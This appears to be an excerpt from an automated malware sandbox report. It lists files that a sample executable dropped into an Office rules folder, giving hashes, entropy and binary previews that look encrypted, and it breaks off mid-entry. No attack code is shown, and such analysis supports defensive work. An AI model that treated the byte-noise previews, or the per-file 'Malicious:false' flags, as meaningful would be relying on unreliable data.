                                                                                                                                      SHA-512:D3672871DA39BBB16BB422CBE862337522C7D4D118DEC170F5EA896794DA345F304FB268CE0220F9A641E4C2923A921D40EFF97F2F2B3C9396244508E44797E4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..]\5n.....U.].q4.Z.Q.5......bq6~+......b5....P..u....cVk/.>.....Z..+...E.B5W.QG.GG.F.n.1!E..x...o.#r..C.(...^.*5..p..o9......'&../...f.w..(b...W./.C.........._.F..;...Hg.;.\81.5Ir.....Pdv....w......O..;0LC..P3.._..:.~f..8.8...Q.z..$..w.=G1.....T_<.{.......jd.!.F...K..$8R.3}..J...<.M$..Z=......eY.@RzA~ts.z:..w.-....`.....6.e........9y:L.rR..4V.,.A..C.........mY....7...+Lo~.o..h...(........'..Bi....,....c[.p..'Le..v..#.......u.8[....6..h....E.*.0...=..*;........Mpx....V]8..PV..X..r....E.4..jrtP......;l4....4v:l...b/.F..X`..VJ.f...?....k \u..;.(^h6.^euXR>.S...4..|{.7TA.. .*g[A.......&........PU..H-f_f.H3.+..h:.of._..6..X.@s.V.2R...O'BZ..0......B..k.[..x^......)$...({w...x...5mw...VE...2..W.5{jm..[.......B3i.<.G.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224083v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1163
                                                                                                                                      Entropy (8bit):7.811776765179004
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:4XSrkmDKEF8e7vm+SfD7492BS4tM49gBvr7Zt9UZoGeVrNYGbNI0bD:4CrZr7v0/48BS4tD9M/ZPUZQVlNIeD
                                                                                                                                      MD5:3B7466A95A80264E4668BDC621EC87ED
                                                                                                                                      SHA1:52DD5EE4286C5BAC7DCA4B52B25DC74CF3B40C96
                                                                                                                                      SHA-256:186E92BA30671DC832778A668350EFFABAB9AC56027E15EEFAE11B1EAC95317D
                                                                                                                                      SHA-512:636002FB985F03EDB296D0C63E3FFE823CCE74B724EA15F765E77B3F117043C4A6B8598BD3C4ABE2156A2F7A97653FA6252535C12999AD5A8B630AB6CC245077
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.a..`J...ue*\`Y...y.v7v}.].k.V.!9.....A.P.L*.....`h..IH.wo..G.3B.6.T..%e.....|.o.).......8s *.{.w.6..*_./@g.!G..R.1...[Z'..IOIV..\..sT....f..aR^H?.<..b]sH..Bm.........#....#..c....b....,]..[?x.u,\.d.o.q.).F.y..*c.|.A8.....3}g{..._..B..z.`..M..>..H.n.B...~.(!|..."l.\.......n...5 ..X!'M=XiT|R.....'.6@aw..;.Cp......%.._e ....sE..m...=..=...~...="//.'./72....b..FS....i.*.a.....en?P..Z.W..#...|...&:...`...*..t.s)..@..'.F.>;..49.....up?:......lm%.=...Uq{...z........GBNS...U.../..E....=...1.....j.}x...t...}.=....;g..u..|xG..+...v4.\N.&.._m1..?.."2..F.S..^.......RM.)...2.F.s......E9....My..{.X.............._...G..5l.....k ..#A.[...P}..!.@.F.?..zC<F.\..A.VMB*..]M..x.!1.....F.Y`..v....>.N,..h....(h+.g..o.....{%=...oe..R~.$...]S..)8......'..~..d.....3.y".t..ZL..z..Z..:........M..B...:...~....,.ZL.t.....M....n.>yD8.r..y.?n...q...!-....(..l(..)......g.\.n...>..FOS6..F^..#?af....'<....uJ;>...r...m...D......;.@.W...a.'....l.*n......K..[`.K..

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224084v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1146
                                                                                                                                      Entropy (8bit):7.815905809553063
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:Rup5klg5T97WQR/LXwsqFj7AQ8Cx924iE/6o2o9zurICqLqnPNbD:RupGlgb7WQRDX0/8CJi8f9zLCqLq1D
                                                                                                                                      MD5:A4727CE642AACFB7373FC7FF9456C7FD
                                                                                                                                      SHA1:037126A651E4C38DF1C467542CB24B9A64016A9F
                                                                                                                                      SHA-256:1F679BAD1A9BABA1482A875C5BCDB7E6AF39BE2D6625371682E7B824F387BC03
                                                                                                                                      SHA-512:3737A5A831731FB502C7F1EAB069FFFC09C048D2C55D8D3340B565877F1A959AFAA1D1D7413DC4073EF0C48F59A60AAE79C695C0A5A90E86CD648B6FD10273B5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml....g.....{Vj..s.;...0.S[.ni........S..o|Sw..o....B..|&/W.@......1...G...u.."..c....p..z...l.A....^.E+.....xr..iHC.S c..-._E..l.F4..0....4.Z...... .ZMU."/F...r].._u..&......(.zG.'...'......p..d.C+.Jh.N.'...n`..3.6G.C~....Gt.b......S..c....].j.-..R....Q.H.......n...N....]~.#.#3-.w.......G.V9.|O&..7........A.G.T...C1........^...T.d.j..UU$.....w."d..=......P......`.%F......V^........lV5:._...F.,1.<..R....=.=sR.wz#..-...s/#.B..]...Gt.Q.8.... }:.T..+..cO.....<...P..:t..3@..q.nU...?...[oqx..4..>...eN.g...~.u?.3.....lV .x.A..P..{G:.W.j......[>Z:..iH.=+.%&.?.[.BPL,..},...#It......:|0....U.....W..0.....5......V.i.?P.@.".Aq.-n........x.`. dns.,V.e...J..:.Z..._.R..V..R.C..Zn... ,...kR.I.........k....6.H.&.(P..t@:L..Ys;....TU.h...+X.5....Z...Z....,7o Z....:.~.j<..mCF.?z..c...oD.^`.....\....yW...R".W..-.......WX...rC})a..|.U........Kt..|...Q..0E.l;...}.....s[a<..hb.mu.v.._U\Y...MUW~.4.F........!......Ap]....J..).Jm..9...H.p.;Qo/.B.[.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224085v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2797
                                                                                                                                      Entropy (8bit):7.935287237958376
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:VIcg5B3Fq4+kn/w2gdVeWIAVf8F4c9ulQOyrOqCvVG9+r6X7AWWel3j44dpjTMPK:1gA4+knmL9VfB+RrOPVCM6XMqzZb4S
                                                                                                                                      MD5:9616E616EC0830D858ED64EA4D9369DE
                                                                                                                                      SHA1:45D0F4C4C5EB840E32678FF996D4D61DC654D904
                                                                                                                                      SHA-256:6CD603929D00A81DFF406126A5A19703DEC35DC6CB05D1D6546688005C7FF72F
                                                                                                                                      SHA-512:EF1B785A7012D439C4FF547F6C3E2188BD9F3E15187D72D4519C36BAF906D724D0F884ABDC338C3299CDE5F339F4576C8B46244C0EE8AF21E44AD6C6BAAA1AD1
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..^..}..O....Jm1...,O#.v.$..#4.s..>....).....0,..\P...V1...H4.....o....{)....w...b........dX....... ).1.;..).\...l..!....>.3me.0 .J....wL.y_......_].r.......7.n.V.E.M.1.I.v.T.?m<.3......{_..O...M......WI.*.L..........(.iV.....;k6.....Y..A@..^....'6!.h..J.CL.9.4b&....U.7....G.$S.U..3.\...RTJ..]zn.-..@\.....{.m......Z_..[H.xjG..4.a.....rOaJn2.&E..;9.U/..E......O-9.._d&.`...!.......m..a1...i!.d.c..a.G........I4.......=8.%+.R.;.........a+.n.6u.m.;.C(..,.......9..;-.B...._m..QJ.;ce...@.".t.Z.,)....5.../%.CP.C.."Ok.y..A$S2K.(..^9..*.,.......+...l....dC.A&!U.+....a....Q.e..r.5.p@+44..{k....vk..Xk_.....it!>Vo.K..2b....j..1_>8.:7..i.....<c..:......F1...........|/b..E..B.cY.c.s."../a...F.......~.O..*2.b.gl!P....\......-l7e.K.....R....W...r..........V. ..0.`.y..R|J:.&....`..+.kY.p...\....6...?...-2H.W.u..y....J9.H8.LK...3......R..umvz....F.+...0P.>...|R.t.p...........D..}..;:c.1#....#..W.3.B.w.f. .FX...+t..$.F.f<].%..#g.......:..b;....`O...4.F...:

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224086v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2255
                                                                                                                                      Entropy (8bit):7.902935561133333
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:U2aYpNDi0MCM8aDHaQECFclJmhzbukbMA6Z0A2shmQ3Hxsz3oMZblbKvYD:UWpBJTMFaReUJmhzb6A00ohmyszvTKvE
                                                                                                                                      MD5:5E3F7688FD4D65D5710C593FBB1DE29A
                                                                                                                                      SHA1:DEA650029ADC2B4967FCB5B95A026A26DEA8408C
                                                                                                                                      SHA-256:22024443B6CE2C1227DF3A638E4F61570824FD2BF50D94079990FD26E6428D85
                                                                                                                                      SHA-512:317F0A933465A1DBAB64ECE051237E1BC0548C2D55F7C38A28217D961661CC9A552B10D1E515A24EE62E051BF74C20AF5275CB8C5516826F8EDC5A0986C1C3BA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..w..y.S.1..$X3....R<.Bs".....rD.;...3*.....G.r..@.4.1.t...rI$y.`.{.:(...kEB..K.........^{.....r".giw..a....]v...KW..w&..H..4...." .q...Q...o...d..]......f.;)......h..qb......an..KB.....3cLSZ.....sqR.u.........y;..H..!...zI.":f..!7..6*.....q.....t].S......T....:.....%...].....Y....$.l..H....7#4.TA..Ou.+.D.x.....O..`.!..}6.K|...^-..,/....<&.~.H.....}|.G..<.t"..d....[..".... ..-_..>~...`N_/..)....f..Uu..g..w.*K8.....Z......O....c.....t$..'.N...Ws.BLR.....?c:..k.Z.e...j.)...z.F.uK.l.].(.9....=.S...2|..@V$........a...Y.....v....P...#.*n.d.%..G...x...g......*..-..V<.w....r7...Z..%....67...W........l,..Fr..d.....eh..>1.....1.5...R...y....N...j.2!.h}@.v.Y.%t...*..v...@{..l^`hBD.........%=.\{*.."..S. ...D".r....F.u..4.6(*VLHfELn(...tcC]..W...mhfzA!.p.v.;.oG..v...c.E....X.*........K..T..q..}....dF.....iQ.......Q...V...l.........K.-....6.6#!@.~.z...d.....07S0T.H8H...Pg.......+'8.q#7*.f.......i<p..........t%....k.r.]J..f.^...4ao.....c.H.6P...0g

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224087v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1738
                                                                                                                                      Entropy (8bit):7.882944362093122
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:s5ZRSkYya2uuWn+WDs1l360u3j3jFoh/RD:s3Re2m+WDmVV6judZ
                                                                                                                                      MD5:6F4CFCAF535214020E609158A37989A7
                                                                                                                                      SHA1:5DC455D73A1B793945E426B0CA49EA8D43F3D43C
                                                                                                                                      SHA-256:2E6FCA0D16605BC2C90A0A38079D056B18EA84C150962F58FBFD46E58C15A794
                                                                                                                                      SHA-512:34667724D0852B39CC40B805120418DD92C4F24074AB9B780158890C532FCF6EBC0B6CE57D3AFB4E01488D6822B0A68E9CFFCAC5A6159B7C075AAA68C30510C1
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlF.........S.....n.Tj....}..7...9{/..O.gk..j.~.E*V....!...N..z.7x...1.;.iXK.?..u,.s...&...c.4jO.....d..VL.eI.6..."QU..G...0..>...=.Z.g\`G..\.7T4f...]........g.`.%.|>..K..yd....).I-8.......c&.x.f;.V.a9.Q.z.......F&m.%{VA...I.-..iy.`[..../c.....m....f..T.%?..H.<C.U..`../..f...?.%V....c..&..5V.n..i.^..hUU$...o....?O....*..>b.....z.Z.S.h...]An:..n.....x\.v7...e3...u</....;.$.....@...kP:....U..og...T..N....!..!..d2<.l...h.....U..T.x...J...&.)...@.......Y...z...y.%...P.8...e...~R.k.._+E.OO9......O.G\......L...pX...-'zC.:...m.>M.I....L{.......B........`.g.].... ..OUe.w...m.....+.R.!......e.%.2...s...A.I....q.....p....Wz<.9D..A .b4.;g..|.m..\..l>.AF.d.s)4.D%&.|...KP;^J.1-.'..s.o.....(...i..m0e'.o......j..9E.....|[i......d.o.d..-..M...;........B...c.J..I.U..'t.c........61...{\...ln.......$..O....AF...F.,.M.{Nj.5!,`...n..]..x.;../?.....4..^...7....\..7s....g.8....z.....dj...B...D.D.8^.k...|.S..........A....&"...Z....`.Y.2..$#.cN.?..F..(...8(..o...

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224900v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):776
                                                                                                                                      Entropy (8bit):7.697751462417213
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:10kBrDUOfiuPsPKcGLrgIRoSDPbLZLgqoLKpCYcU5lMWvVSStMq0oNgzDHERcc3e:ukBrD7NPMCVK+vZLvMYTfFVSORzg/rbD
                                                                                                                                      MD5:5FB870DE3E2D2025B6D6B241C014BF10
                                                                                                                                      SHA1:37298550C2B45A798CAB244247249335E3D07BF7
                                                                                                                                      SHA-256:7AF0037ACF76BEAC6A69F0B16AD5F04F04A3535D492DC931354398B18A594615
                                                                                                                                      SHA-512:8774F6E4810D1664EA11D71EA48CA0357612C41CD6804BB664382BF624AF0D5A1DCC550160FDE6BCC92845C638E8F11C8711B9EAB4536277E961825E21CA9265
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..1W.+.....${..XA.~|6J-.d..H.....O.Q...B.,......W.s..:.......P..l.Ezy..!......J.~<....-c...&;...C..YBt4k.C......8!.tH...c ....D.%).x)..:*...s..N.H..V.I*J.....)..j:..../..x...b(......4Hm..H.J..?7...R4..oQt...28...;?p.M...T.>..^[.d.N..<.&-..OG-.1..n.`........Y1.K../.....E...a...?B..\[.......KVBoQZ....8...8..bS....}.L...H.l.@x.......9(.#...A..K..c.......1.g..{..*\..XR...&g)K..:..3.=%...q...Ra..<.u./....=.$0..J...Z...8..k.....M.1=.I...J...y.I.4J+F8..v<.....@PYF.....z..0.~.$>.p...0&q.k.\`P.I....o...;$0OH..&.fs..2.we.u.. .........!........nzE<..I.5..4..f....!...N. ..1..&T.........%...-+p....(..ur..$.d.V{...ZW....@.^=DD......!....J...m..<........y}.}EYrX,.......tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224901v11.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2617
                                                                                                                                      Entropy (8bit):7.924029295250344
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:4Rqz79WOXoSKXXEsyRVTZH3Sln+cnwf3ify1PgGj1/rd4reAEiy6HuaQWWbTkcD:4RqfSXXGLSF+cwtFgGjtER46Hua74
                                                                                                                                      MD5:8E767589F42526F0BB742B7436C0BE9B
                                                                                                                                      SHA1:168621FDAECA6BB615522EB296B418FAAE91FBF0
                                                                                                                                      SHA-256:905FA029A81345678DE1A9BA8B598C6A171A5024E40061F07273C4617683F735
                                                                                                                                      SHA-512:6367DB5EFA88B52ACBACC755EEBDF482E74C920E20F6632F35DF84DAF59801DF9E7334A0CC8323480D2AD2E76688D0F0AF88E58E20E18A98B6C00F54A6881736
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml3b.......'..[.N....0.B....5....H.t......4...5S.e.}.,..9.@..};=....:....1..L6W...?.`.oUP\.@:....v..t.Ua.Qu.I,..T.,.m.?....&.-.(ZL..$..J..?y.d.+...K......8!.]..$..UA..Io....R.rF..ZQF..s..Cc...Q..$.\..t...u..@.|........_y.Z.....]..B.z.|.`...@.s..f...=....MN.#jI.Bf6.wd|.k.7. .5.x2\.....Nb...q...529Bt.;.+d6W%"....k1.B d...[).4...5..}.c.9..K...Q..Y\_.....IR.H......y..O....Z..(M.gOH..e$h.....]..\.....(!...8......~<.?.j}M...\.:.)r:W..........Ku.........'v..8K=j.rw......ZA..O.)k....AF...s.I[sK..%.O...._B..b.s.8.Q.P..&......Q.."/...].U...{B...].v2.>.u.......J..\..h.].`.....ME(/..F...)8..Vq;9.{.@...E.R.a..yg..:v.Q..8.I..W..../-5..L%d$...i.;q.?....LOm3P...N=6#v#^V...+]!>4b..>...sLc.x.<._..E<0.9r....a...J.tC(.k.b...)ah.{....-..>.....]s..%.....v.=;.9|.P...U..&...@..2a>..BhN..L=z.)...p...o..O&..z.......\...D.*"..Y.1G...^w....Ws..v..p.s...'.#.G..L.m.21L!.:.O....Uq.N.c.vf.(.........d~wPH..|...f....185..k...#`V6...&..S....^.of.r]J0..........Ik.....Z....5.c.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224902v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):783
                                                                                                                                      Entropy (8bit):7.7343018566022685
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:ei5HH2yB9nHlylfnai+TElb4D5uH+hqSI7j8vDU/61Dt71zR72l+m8/4nfukIciD:HWYnFyX+24D7fI7j8vDUotwe/gkbD
                                                                                                                                      MD5:AB90E664BC21A37420AC29E1FDAC2D3E
                                                                                                                                      SHA1:AAF06F45B40749C1E699188C62FC141E4AAA97E7
                                                                                                                                      SHA-256:1770BF6BB2B52303DCD6793B38656FC450F41DD6177E75C9EEC73656B9CCA3E3
                                                                                                                                      SHA-512:6EC3C17F3E440098CE8FBEF96AC5235CD74694DC4DD01D1B40FDB21F7C21ADBD48E2C40DB6741E44C670561260BC0EA04021C606475A426E5524218DBF3E39F6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.....)...ubm.8...^9.y.h.kW...T%........S....Y.....N7@H.]...a.(....,../9...3.3V..d.M...ns.9.....LM..6...k.<...M....*[=.h.....V....d..rW........(..+.6..D...o..rov..4.<;..X@.w.eA~=g..@.:.V`"..H%....M.{.c....,...d...X.....e............d......S.|........-f@..?*./.+..u..-i(...=ko.........Z..zm<...u..T.f..;.N.U./x.7..(6.V..A...<.F.....s..Y'..=.....Cl."..P.d0....:.PG.J..!m..A...?.@.|......_../vgi.....%[b[..ih7....8;.@J.U..RX.f.GZ.IP........tH.8_.....j..t.:S7.y..1x....5.AE."......X*.9.(....v\....2i[IlS......RR.j..0....=..[ ......u.X._Ij.~...R....,8-..0.H_..^.........C..`......DW\...L....+E".Yf+V,$.*.......=.y...e.....d!5...!.a..&......X\.A..A)[..@o.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224903v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3546
                                                                                                                                      Entropy (8bit):7.945613783902571
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:9prEDdnb7dwJI5qC/5LDy705XVGqRfmNYW0zh8VHX:sDhpiIP5POCX+x
                                                                                                                                      MD5:B6310002158A1F1B05979CD9B03C3617
                                                                                                                                      SHA1:C720FF010CE5BD5F0E793CF8C45C757E9DB200F1
                                                                                                                                      SHA-256:92D764EBABFE79F432CDBA0E1C464A030F91053B57DFB42239EA20C4E0B9AB2A
                                                                                                                                      SHA-512:628AC1A292E0430445869A69AA89EF3963003809461A93F44AFBCD467665304C69409E44C3E52B52FF90E78579B01A93F32A7E93802269FDCA796A01271DBDBC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml'$_l.......Z5.A...'%..n)....OA.U.I5..P....N.H.....PR...P..-.....dq..y9..... '..k.@'\.#....gy.#I...B..].6....$....m..=..j.GAG&.....b..y.......dd.Y,*.Ao...2B......W.Y..........1G7i..^Ko...T"p.:0.6Z`*...$b.|...]B..1..e....g....}d......l....../...-...?2...D.6.X.1GU.iO..uu5._..p:.CE.f.....x..'...........VpX....VP...kd.U..U....#-HbN.......Y.....{6J....r...:_.}.C..v@V,.....^=.b'.....b....1f)..n.&iD4....l.....-...E..Hq.I.%.).`..@N.Y=].%...fS;..jd.....y. .u....#..[.....P..[...m<q........8.a-mc..Ym;..A..s.S...-.N...6....X...P..*.!D....I.D.pI..b.i21...B...X....i...#......,..Qm..Ik.?.oC9cZ"...V._...Lb?9...%......)......Fnym..h.Jp.g.......-.....ni..G."k......N.$k.=!....d..n.U*....rItC..6.lj...j-r..D....&.h....i.m..(UAw..57....=...k}.[..%.....S........G......5..Z.#.<.#XtD?)`..M..d4.Pt..(D..#._...t..K5..$..p=j.x.,..9t...../...O...x..p5._.]=...LY.M.Oic..SG..c..7..v$..#I..|T.B.Ky...GY.6..!;......*...*-.4.EQM+....P......4@T.K/.=.i6...7...c.bC.P..}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224906v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4900
                                                                                                                                      Entropy (8bit):7.966323543443026
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:y3sbGJ+oL+1Y25EB0Cid5G0eZ1pjT22mQgdH+wQcOGvkfnjtyo:W1+oL+pVd5+1t22ydH+YOGcfnJr
                                                                                                                                      MD5:384FCC63393D10FD1CF0E48D8792E95F
                                                                                                                                      SHA1:41BB14F2C6851B61F183A44329BEE2B0BF9DC7CF
                                                                                                                                      SHA-256:4E7EC5D06A78C77920277D9572298332C333F3A40C19DC9274909B440F0F1FEF
                                                                                                                                      SHA-512:FEE97B6CDAC187CE9368B77CF64D3884555A4BDF33A67195B6B7644F4DE59E51653CAAFCCA6AADD6CE60011E9A9F884596AC3793AB042F48A07236439F45B546
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..F.@......}..<.7...../p.$R......`....3$.Na..'.......j{,..;c{.d.Jg.#..kq.4d0P. ".X.!Di.U...a...YA<.R.1.F.B. ..C.\.)..1|r...^).X"..Q..T_.<....gT.=1..!^....I.../...'.x...VT.-. .J..\.:.....X J...;.y.....[...pN...t...;.rGNY.-.`.F0...=..Z...+t>..+...3........J....P...R.(.X.]..2..ef....@.ZJq......B..Q.@....T.*...ET=..M.t.i.B....p.......O....M3...v..bk.!......bj...`.}0V9.4..B.<.........5Vqj.......z,]<`.Pn.FZ....}<...o.7........q.y....:T....)..R..`..,...P..'.....r..0...._l.+..H...:.-G.`...."..~-.....'c...(..+._....U.wh..e....Fn+{.<s.^;..H.Fq..?Gy.h.^./.`C.>..".../...q.k@.R}..n....h.I..p.{..>.<$........'.....p.w..jh...S`G+......._[...T.pd.....6.U-.9.\..:.......m.... R. .7c2.jT.<z~:.....|.*.H].|L.........~..H..a.....3i0..l....F.....q.../K.{`..#...J.....6.K.....!....Q..C..@...../...N.......`.C...wrR..Z..^...._mE@y_.B%.Kg....8.E..;.........J...xe..._a..j3|.c.k9.*c..<..l..).?.FO..k6v.Z.......s......u.....yW....6.a8[...{`.....w....R..`%v..C.....M}.....B

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224910v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):776
                                                                                                                                      Entropy (8bit):7.7041165544263706
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6HCINSduzzxh9gxuWRArinUck1WOB0FPdLKN3z6BNw6IFe/OxD2I7HBdukIcii9a:6bUWhK0/+Ul1cXLeOK90/CDDjMbD
                                                                                                                                      MD5:81426F0F0AE68B6547CAEFCCF27F52DF
                                                                                                                                      SHA1:4EA87EF79828F1C57D7DAB2120CB47A02091C8FF
                                                                                                                                      SHA-256:017FD490FDFE5C0D94A58272BB7EC14FA662F331683B6FE600B9284150BF1F06
                                                                                                                                      SHA-512:9649788E8FC938D6164E1BB3E2D3B57102C90C9DE959AB3A40328DE1BC107764AE341480BDDE93285B5F3ECB50353F2B38D43480BBED6A914C59E57EB42F87E8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlt.._..f....p.i......2.j.Y....F.up.......iQZ....i......5.Vy.v.........[.#..}.S....d..$J..d...`v.6...%.r.z.c.)..54l..M.....G..........F......;.?..T'.R.p=.7....T[Q...,y.:&...........(.t+....s.N..t.g......[o..90k.t.....z.5.....?V6...0mQ@.%....CZ.......s...&m.q..WF...X.^A.....!@.uE..9.\..... Wd3.2.n.@./.2jT..tn.V1.tO".`o..C.8f.F.}.{..e...=.5...g..G.#..$..C.m.7._...>f.~..#j.x..O.2>..Qw...D+.j.q:..&<..Wx~..7.....|.pO.P..H..[-..<5..7..q.u...+...'..@d...6....<$%....N..iH..e.QW./..... ..(....._...Z...."...).7V.^....J....$;.yo..*W.S.r....8h.Y.......c..KE..h.M.f.|.g.G.N.L6.Ty......M...>$>.:_....:o.....N.H........G*E..1..z5.)44_O.q...f..8q2...\.B......eh..z.~.o..C..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule226000v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1457
                                                                                                                                      Entropy (8bit):7.836191975977336
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:ZedP9V15z0daIzGF4fHNn/1Nic0EKngLP4b+wu22bdItJ2HZZ/pN8kT+Zw25bD:ZgPZFqjggBHrKngLPW+H22qn2HZ9pNBw
                                                                                                                                      MD5:A0643E099402E3BD586A8438F765BD94
                                                                                                                                      SHA1:4F7DE40BDC123B37718EF101FD4ED925A751FD8E
                                                                                                                                      SHA-256:F68AEC413F07412940B40B000C7BC80B4B12812A17E17A68391105D0C3EDF890
                                                                                                                                      SHA-512:BF85D9E63C1DC3736426DDDAA4A470D5B04CC148D463A8D7389F8BBF8FA4357D9A2A61ACE9B22240DF8439861AD82A1B33D60168895115BE3B9667BB06E6F046
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.)*..o....j...%;.K.....+..P.. <...J....q..d.'v......#.q.+A..I.^.^).y..>.d.D%a. ..:...x...M.....x.I.\>.M.o/..F.B.?..z.Q....o%.x.f..|.M......#.o...4F..].9&...u4.MZ .1N.].J._[.^.|..g. .Y..c.D.2.h..Fn@..Wg....g8_yS.4.e...A.-.!..........\fO.....=....[?.....bN.@..E........ .@q.@.Fhs.......?j.Y.4bb.."@....<:..L..^M..K.B>..-..D-.J"-.c:.ear.o.b.xn=....@d;.._I....6.,C.8.%..,.g.....z.Y.[.y....de.6.V..W{...}.lww8:y..s.G..4...IG....HB..v.........+......BJ..C<..yo.b*..0H...w+8h..y..[..\.@.8..1..jr4..@..j....7:e.u,|...GX5.?u....n.>1.c.H.FHpG.^.!L..fF.kV.+...}p..@.*UN...D.5..... ...]..rt).....C`.E..a.e.5.(./8....^.[oQ..R.=L*....z.....c.5..m/......t...c..a.b|$x.x...|.!....qP..x6K]H.!z4zpw..g..b=:.v0....fPjZ.]. ..l........T.wC]K;...6...^.1R..0.~:.C.d...-...2p,.z.+..*..`..?E..J..].t..{..5Qw.Eb.2.x...M...........;..-.....S....j......:{i....Pq.$.....h.F9.4[.n.T,.e.<...6...3S.d.y...>.u..S.....d...$...'h.f..)$...i.. .4 c....V.tZ...K-...w..81QE4..."..k.I.=.%...h^x...

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule226003v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):818
                                                                                                                                      Entropy (8bit):7.717379743030909
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:aBgjnT1gZ5PrJ+maMMbxLDP3y+VVfOIASJmbD:kgjT1gZ5PrwzdLLy+X0lD
                                                                                                                                      MD5:B366939A3F0BBCB5C60A4998DFE57938
